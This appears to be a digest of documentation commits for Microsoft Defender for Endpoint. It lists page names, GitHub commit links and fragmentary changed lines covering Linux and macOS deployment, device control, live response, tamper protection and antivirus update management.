mdatp threat allowed add --name "EICAR-Test-File (not a virus)"
```
security Linux Install Manually https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-manually.md
See [Uninstall](linux-resources.md#uninstall-defender-for-endpoint-on-linux) for
## See also

- [Investigate agent health issues](health-status.md)
security Linux Install With Ansible https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-ansible.md
When upgrading your operating system to a new major version, you must first unin
## See also

- [Investigate agent health issues](health-status.md)
security Linux Install With Puppet https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-puppet.md
class remove_mdatp {
}
}
```
security Linux Install With Saltack https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-saltack.md
When upgrading your operating system to a new major version, you must first unin
## See also

- [Investigate agent health issues](health-status.md)
security Linux Preferences https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-preferences.md
To verify that your /etc/opt/microsoft/mdatp/managed/mdatp_managed.json is worki
Once you've built the configuration profile for your enterprise, you can deploy it through the management tool that your enterprise is using. Defender for Endpoint on Linux reads the managed configuration from the */etc/opt/microsoft/mdatp/managed/mdatp_managed.json* file.
security Linux Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-privacy.md
The following fields are collected:
## Resources

- [Privacy at Microsoft](https://privacy.microsoft.com/)
security Linux Pua https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-pua.md
In your enterprise, you can configure PUA protection from a management console,
## Related articles

- [Set preferences for Defender for Endpoint on Linux](linux-preferences.md)
security Linux Resources https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-resources.md
The following table lists commands for some of the most common scenarios. Run `m
|Endpoint Detection and Response|Set / remove tag, only `GROUP` supported|`mdatp edr tag set --name GROUP --value [tag]`|
|Endpoint Detection and Response|List exclusions (root)|`mdatp edr exclusion list [processes\|paths\|extensions\|all]`|
security Linux Schedule Scan Mde https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-schedule-scan-mde.md
crontab -u username -r
| | | | +—- day of week (values: 0 - 6) (Sunday=0 or 7) (special characters: , \- \* / L W C) <br> | | | | |*****command to be executed ```
security Linux Static Proxy Configuration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-static-proxy-configuration.md
sudo systemctl daemon-reload; sudo systemctl restart mdatp
> [!NOTE]
> Red Hat Enterprise Linux 6.X and CentOS 6.X don't support the **systemctl** and **/etc/environment** methods. To configure a static proxy for MDE on these distributions, use the recommended **mdatp config proxy set** method.
security Linux Support Connectivity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-connectivity.md
If the problem persists, contact customer support.
## Resources

- For more information about how to configure the product to use a static proxy, see [Configure Microsoft Defender for Endpoint for static proxy discovery](linux-static-proxy-configuration.md).
security Linux Support Events https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-events.md
List the filesystems on the machine with:
```bash
df -Th
```
security Linux Support Install https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-install.md
Now try restarting the mdatp service using step 2. Revert the configuration chan
```

The path to a zip file that contains the logs will be displayed as output. Reach out to our customer support with these logs.
security Linux Support Perf https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-perf.md
When the ratelimit is enabled a rule will be added in AuditD to handle 2500 even
## See also

- [Investigate agent health issues](health-status.md)
security Linux Support Rhel https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-rhel.md
pmap -x <wdavdaemon pid>
Where `<wdavdaemon pid>` can be found using `pidof wdavdaemon`.
security Linux Update Mde Linux https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-update-mde-linux.md
crontab -u username -r
| | | | +—- day of week (values: 0 - 6) (Sunday=0 or 7) (special characters: , - * / L W C) <br> | | | | |*****command to be executed </pre>
security Linux Updates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-updates.md
sudo apt-get install --only-upgrade mdatp
> [!IMPORTANT] > When integrating Microsoft Defender for Endpoint and Defender for Cloud, the mdatp agent will automatically receive updates by default.
-To schedule an update of Microsoft Defender for Endpoint on Linux, see [Schedule an update of the Microsoft Defender for Endpoint (Linux)](linux-update-mde-linux.md)
+To schedule an update of Microsoft Defender for Endpoint on Linux, see [Schedule an update of the Microsoft Defender for Endpoint (Linux)](linux-update-mde-linux.md)
security Linux Whatsnew https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-whatsnew.md
As an alternative to the above, you can follow the instructions to [uninstall](/
</details> </blockquote></details>
security List Library Files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/list-library-files.md
Content-type: application/json
## Related topic-- [Run live response](run-live-response.md)
+- [Run live response](run-live-response.md)
security List Recommendation Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/list-recommendation-software.md
Here is an example of the response.
- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
- [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security Live Response Command Examples https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/live-response-command-examples.md
undo scheduledtask Microsoft\Windows\Subscription\LicenseAcquisition
# Restore remediated file
undo file c:\Users\user\Desktop\malware.exe
```
security Live Response Library Methods https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/live-response-library-methods.md
Last updated 06/03/2021
|--|-|--|
| Commands | Live Response command collection | Array of Command objects. See [live response commands](live-response.md#live-response-commands). |
security Live Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/live-response.md
Select the **Command log** tab to see the commands used on the device during a s
## Related article

- [Live response command examples](live-response-command-examples.md)
security Mac Device Control Faq https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-faq.md
Answer 2: Run _mdatp device-control policy groups list_ to see all the iOS group
- [Device Control for macOS](mac-device-control-overview.md)
- [Deploy and manage Device Control using Intune](mac-device-control-intune.md)
- [Deploy and manage Device Control using jamf](mac-device-control-jamf.md)
security Mac Device Control Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-intune.md
You can deploy the mobileconfig file through [**https://endpoint.microsoft.com/*
- [Device Control for macOS](mac-device-control-overview.md)
- [Deploy and manage Device Control using jamf](mac-device-control-jamf.md)
- [macOS Device Control frequently asked questions (FAQ)](mac-device-control-faq.md)
security Mac Device Control Jamf https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-jamf.md
A new 'Device Control' property will now be available to add to the UX.
- [Device Control for macOS](mac-device-control-overview.md)
- [Deploy and manage Device Control using Intune](mac-device-control-intune.md)
- [macOS Device Control frequently asked questions (FAQ)](mac-device-control-faq.md)
security Mac Device Control Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-overview.md
In this case, only have one access rule policy, but if you have multiple, make s
- [Deploy Device Control by using Intune](mac-device-control-intune.md)
- [Deploy Device Control by using JAMF](mac-device-control-jamf.md)
- [macOS Device Control frequently asked questions (FAQ)](mac-device-control-faq.md)
security Mac Exclusions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-exclusions.md
For example, to add `EICAR-Test-File (not a virus)` (the threat name associated
```bash
mdatp threat allowed add --name "EICAR-Test-File (not a virus)"
```
security Mac Install Jamfpro Login https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-jamfpro-login.md
Last updated 12/18/2020
## Next step

[Setup the device groups in Jamf Pro](mac-jamfpro-device-groups.md)
security Mac Install Manually https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-manually.md
See [Logging installation issues](mac-resources.md#logging-installation-issues)
## Uninstallation

See [Uninstalling](mac-resources.md#uninstalling) for details on how to remove Microsoft Defender for Endpoint on macOS from client devices.
security Mac Install With Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-with-intune.md
For more information on how to find the automatically generated log that is crea
## Uninstallation

See [Uninstalling](mac-resources.md#uninstalling) for details on how to remove Microsoft Defender for Endpoint on macOS from client devices.
security Mac Install With Jamf https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-with-jamf.md
This is a multi-step process. You'll need to complete all of the following steps
[!INCLUDE [Defender for Endpoint repackaging warning](../../includes/repackaging-warning.md)]
security Mac Install With Other Mdm https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-with-other-mdm.md
We post notifications to our [What's New page](mac-whatsnew.md) once we make cha
## Check installation status

Run [Microsoft Defender for Endpoint](mac-install-with-jamf.md) on a client device to check the onboarding status.
security Mac Jamfpro Device Groups https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-jamfpro-device-groups.md
Set up the device groups similar to Group policy organizational units (OUs), Mi
## Next step

- [Set up Microsoft Defender for Endpoint on macOS policies in Jamf Pro](mac-jamfpro-policies.md)
security Mac Jamfpro Enroll Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-jamfpro-enroll-devices.md
For a complete list, see [About Computer Enrollment](https://docs.jamf.com/9.9/c
6. Select **Continue** to complete the configuration.

   :::image type="content" source="images/jamfpro-mdm-profile.png" alt-text="The Jamf Pro enrollment6" lightbox="images/jamfpro-mdm-profile.png":::
security Mac Jamfpro Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-jamfpro-policies.md
You need to make sure that all machines receiving Defender's package, also recei
> Making configuration profiles depend on Defender's presence effectively delays deployment of the configuration profiles, and results in an initially unhealthy product and/or prompts for manual approval of certain application permissions that are otherwise auto-approved by profiles. Deploying a policy with Microsoft Defender's package *after* deploying configuration profiles ensures the end user's best experience, because all required configurations will be applied before the package installs.
security Mac Preferences https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-preferences.md
From the JAMF console, open **Computers** \> **Configuration Profiles**, navigat
## Resources

- [Configuration Profile Reference (Apple developer documentation)](https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf)
security Mac Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-privacy.md
The following fields are collected:
## Resources

- [Privacy at Microsoft](https://privacy.microsoft.com/)
security Mac Pua https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-pua.md
In your enterprise, you can configure PUA protection from a management console,
## Related topics

- [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
security Mac Resources https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-resources.md
To enable autocompletion in zsh:
## Microsoft Defender for Endpoint portal information

The Microsoft Defender for Endpoint blog, [EDR capabilities for macOS have now arrived](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/edr-capabilities-for-macos-have-now-arrived/ba-p/1047801) provides detailed guidance on what to expect.
security Mac Schedule Scan https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-schedule-scan.md
The following code shows the schema you need to use to schedule a quick scan.
You can also schedule scans with Microsoft Intune. The runMDATPQuickScan.sh shell script available at [Scripts for Microsoft Defender for Endpoint](https://github.com/microsoft/shell-intune-samples/tree/master/macOS/Config/MDATP) will persist when the device resumes from sleep mode. See [Use shell scripts on macOS devices in Intune](/mem/intune/apps/macos-shell-scripts) for more detailed instructions on how to use this script in your enterprise.
security Mac Support Install https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-install.md
grep '^2020-03-11 13:08' /var/log/install.log
```Output
log show --start '2020-03-11 13:00:00' --end '2020-03-11 13:08:50' --info --debug --source --predicate 'processImagePath CONTAINS[C] "install"' --style syslog
```
security Mac Support Kext https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-kext.md
In this case, you need to perform the following steps to trigger the approval fl
real_time_protection_available : true
...
```
security Mac Support License https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-license.md
You can also suppress switching to experience for Individuals on MDM-enrolled ma
- [Set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro](mac-jamfpro-policies.md): Learn how to set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro.
- [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md): Learn how to install, configure, update, and use Microsoft Defender for Endpoint on Mac.
- [Deploying Microsoft Defender for Endpoint on macOS with Jamf Pro](mac-install-with-jamf.md): Learn how to deploy Microsoft Defender for Endpoint on macOS with Jamf Pro.
security Mac Support Perf https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-perf.md
-
+ Title: Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS description: Troubleshoot performance issues in Microsoft Defender for Endpoint on macOS. keywords: microsoft, defender, Microsoft Defender for Endpoint, mac, performance, big sur, monterey, ventura, mde for mac
To run the client analyzer for troubleshooting performance issues, see [Run the
## See also

- [Investigate agent health issues](health-status.md)
security Mac Sysext Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-sysext-policies.md
To deploy this custom configuration profile:
5. In the `Assignments` tab, assign this profile to **All Users & All devices**.
6. Review and create this configuration profile.
security Mac Updates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-updates.md
To configure MAU, you can deploy this configuration profile from the management
## Resources

- [msupdate reference](/deployoffice/mac/update-office-for-mac-using-msupdate)
security Mac Whatsnew https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-whatsnew.md
Microsoft Defender for Endpoint no longer supports macOS Catalina (10.15) as App
</details>
security Machine Groups https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine-groups.md
For more information on linking to device groups definitions, see [Device groups
- [Manage portal access using role-based access control](rbac.md)
- [Create and manage device tags](machine-tags.md)
- [Get list of tenant device groups using Graph API](/graph/api/device-list-memberof)
security Machine Tags https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine-tags.md
You can use Microsoft Intune to define and apply device tags. You can perform th
- **For Windows 10 or later**, in the [OMA-URI settings](/mem/intune/configuration/custom-settings-windows-10) section, for **Data type**, choose **String**. For **OMA-URI**, type (or paste) `./Device/Vendor/MSFT/WindowsAdvancedThreatProtection/DeviceTagging/Group`.
- **For macOS**, follow the guidance in [Use custom settings for macOS devices in Microsoft Intune](/mem/intune/configuration/custom-settings-macos).
security Machine https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine.md
Last updated 12/18/2020
|deviceValue|Nullable Enum|The [value of the device](tvm-assign-device-value.md). Possible values are: 'Normal', 'Low' and 'High'.|
|ipAddresses|IpAddress collection|Set of ***IpAddress*** objects. See [Get machines API](get-machines.md).|
|osArchitecture|String|Operating system architecture. Possible values are: "32-bit", "64-bit". Use this property instead of osProcessor.|
security Machineaction https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machineaction.md
Last updated 12/18/2020
"relatedFileInfo": null
}
```
security Machines View Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machines-view-overview.md
On the **IoT devices** tab, select **Customize columns** to see the columns avai
[Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md)
security Manage Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-alerts.md
Added comments instantly appear on the pane.
- [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security Manage Auto Investigation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-auto-investigation.md
All verdicts are tracked in the [Action center](auto-investigation-action-center
## See also

- [Overview of automated investigations](automated-investigations.md)
security Manage Automation File Uploads https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-automation-file-uploads.md
For example, if you add *exe* and *bat* as file or attachment extension names, t
## Related topics

- [Manage automation folder exclusions](manage-automation-folder-exclusions.md)
security Manage Automation Folder Exclusions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-automation-folder-exclusions.md
You can control the following attributes about the folder that you'd like to be
- [Manage automation allowed/blocked lists](manage-indicators.md) - [Manage automation file uploads](manage-automation-file-uploads.md)-- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
+- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Manage Event Based Updates Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-event-based-updates-microsoft-defender-antivirus.md
If you have enabled cloud-delivered protection, Microsoft Defender Antivirus wil
- [Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)
- [Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)
- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Manage Gradual Rollout https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-gradual-rollout.md
For details on how to use these tools, see [Create a custom gradual rollout proc
> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
+> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Manage Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-incidents.md
Added comments instantly appear on the pane.
- [Incidents queue](/microsoft-365/security/defender-endpoint/view-incidents-queue)
- [View and organize the Incidents queue](view-incidents-queue.md)
- [Investigate incidents](investigate-incidents.md)
security Manage Indicators https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-indicators.md
Customers may experience issues with alerts for Indicators of Compromise. The fo
security Manage Mde Post Migration Configuration Manager https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-mde-post-migration-configuration-manager.md
If you haven't already done so, configure your Microsoft 365 Defender portal to
## Next steps

- [Get an overview of Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
security Manage Mde Post Migration Group Policy Objects https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-mde-post-migration-group-policy-objects.md
If you haven't already done so, configure your Microsoft 365 Defender portal to
## Next steps

- [Get an overview of Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
security Manage Mde Post Migration Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-mde-post-migration-intune.md
If you haven't already done so, configure your Microsoft 365 Defender portal to
- [Get an overview of Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
security Manage Mde Post Migration Other Tools https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-mde-post-migration-other-tools.md
You can also configure whether and what features end users can see.
## Next steps

- [Get an overview of Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)
security Manage Mde Post Migration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-mde-post-migration.md
The following table lists various tools/methods you can use, with links to learn
## See also

- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)
security Manage Outdated Endpoints Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-outdated-endpoints-microsoft-defender-antivirus.md
See the following article for more information and allowed parameters:
- [Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)
- [Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)
- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Manage Protection Update Schedule Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-protection-update-schedule-microsoft-defender-antivirus.md
See the following for more information and allowed parameters:
- [Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)
- [Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)
- [Microsoft Defender Antivirus in Windows 10 and 11](microsoft-defender-antivirus-in-windows-10.md)
security Manage Protection Updates Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-protection-updates-microsoft-defender-antivirus.md
Set up a network file share (UNC/mapped drive) to download security intelligence
- [Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)
- [Manage updates for mobile devices and VMs](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)
- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Manage Security Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-security-policies.md
During an investigation, you can also view the **Security policies** tab in the
security Manage Suppression Rules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-suppression-rules.md
You can view a list of all the suppression rules and manage them in one place. Y
## Related topics

- [Manage alerts](manage-alerts.md)
security Manage Tamper Protection Configuration Manager https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-configuration-manager.md
Using Configuration Manager with tenant attach, you can turn tamper protection o
- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)
- [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration)
security Manage Tamper Protection Individual Device https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-individual-device.md
Here's what you see in the Windows Security app:
[Protect security settings with tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md)
-[Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)
+[Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)
security Manage Tamper Protection Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-intune.md
You can use a registry key to determine whether the functionality to protect Mic
- [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos) - [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml) - [Manage Microsoft Defender for Endpoint on devices with Microsoft Intune](/mem/intune/protect/mde-security-integration)
security Manage Tamper Protection Microsoft 365 Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-tamper-protection-microsoft-365-defender.md
search.appverid: met150
- [Built-in protection helps guard against ransomware](built-in-protection.md) - [What happens when tamper protection is turned on?](prevent-changes-to-security-settings-with-tamper-protection.md#what-happens-when-tamper-protection-is-turned-on) - [Protect macOS security settings with tamper protection](tamperprotection-macos.md)-- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)
+- [Troubleshoot problems with tamper protection](troubleshoot-problems-with-tamper-protection.yml)
security Manage Updates Mobile Devices Vms Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md
This action prevents protection updates from downloading when the PC is on batte
## Related articles - [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md)-- [Update and manage Microsoft Defender Antivirus in Windows 10](deploy-manage-report-microsoft-defender-antivirus.md)
+- [Update and manage Microsoft Defender Antivirus in Windows 10](deploy-manage-report-microsoft-defender-antivirus.md)
security Management Apis https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/management-apis.md
When you enable security information and event management (SIEM) integration, it
- [Access the Microsoft Defender for Endpoint APIs](apis-intro.md) - [Supported APIs](exposed-apis-list.md) - [Technical partner opportunities](partner-integration.md)
security Mde Device Control Device Installation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-device-control-device-installation.md
DeviceRegistryEvents
It is not enough to enable only a single hardware ID to enable a single USB thumb-drive. Ensure that all the USB devices that precede the target one aren't blocked (allowed) as well. :::image type="content" source="../../media/devicemgrscrnshot.png" alt-text="The Device install faq" lightbox="../../media/devicemgrscrnshot.png":::
security Mde P1 Setup Configuration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-p1-setup-configuration.md
To help with planning your WDAC deployment, see the following resources:
Now that you have gone through the setup and configuration process, your next step is to get started using Defender for Endpoint. - [Get started with Defender for Endpoint Plan 1](mde-plan1-getting-started.md)
security Mde Plan1 Getting Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-plan1-getting-started.md
Scroll down to see all the views in the Web protection report. Some views includ
- [Manage Microsoft Defender for Endpoint Plan 1](manage-mde-post-migration.md) - [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md)
security Mde Planning Guide https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-planning-guide.md
The following is a list of pre-requisites required to deploy Defender for Endpoi
## Next step Start your deployment with [Step 1 - Set up Microsoft Defender for Endpoint deployment](production-deployment.md)
security Mde Sec Ops Guide https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mde-sec-ops-guide.md
The following articles provide guidance to troubleshoot and fix errors that you
- [Troubleshoot attack surface reduction issues](troubleshoot-asr.md) - [Troubleshoot onboarding issues](troubleshoot-onboarding.md)
security Microsoft Cloud App Security Config https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-cloud-app-security-config.md
If you're interested in trying Microsoft Defender for Cloud Apps, see [Microsoft
## Related topic - [Microsoft Defender for Cloud Apps integration](microsoft-cloud-app-security-integration.md)
security Microsoft Cloud App Security Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-cloud-app-security-integration.md
For more information about cloud discovery, see [Working with discovered apps](/
## Related topic - [Configure Microsoft Defender for Cloud Apps integration](microsoft-cloud-app-security-config.md)
security Microsoft Defender Antivirus Compatibility https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-compatibility.md
You might also use [limited periodic scanning](limited-periodic-scanning-microso
- [Microsoft Defender Antivirus on Windows clients](microsoft-defender-antivirus-in-windows-10.md) - [EDR in block mode](edr-in-block-mode.md) - [Learn about Endpoint data loss prevention](/microsoft-365/compliance/endpoint-dlp-learn-about)
security Microsoft Defender Antivirus On Windows Server https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-on-windows-server.md
If a non-Microsoft antivirus product was installed on Windows Server, Microsoft
- [Microsoft Defender Antivirus in Windows](microsoft-defender-antivirus-windows.md) - [Microsoft Defender Antivirus compatibility with other security products](microsoft-defender-antivirus-compatibility.md) - [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
security Microsoft Defender Antivirus Updates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-updates.md
For more information, see [Microsoft Defender update for Windows operating syste
> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Microsoft Defender Antivirus Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows.md
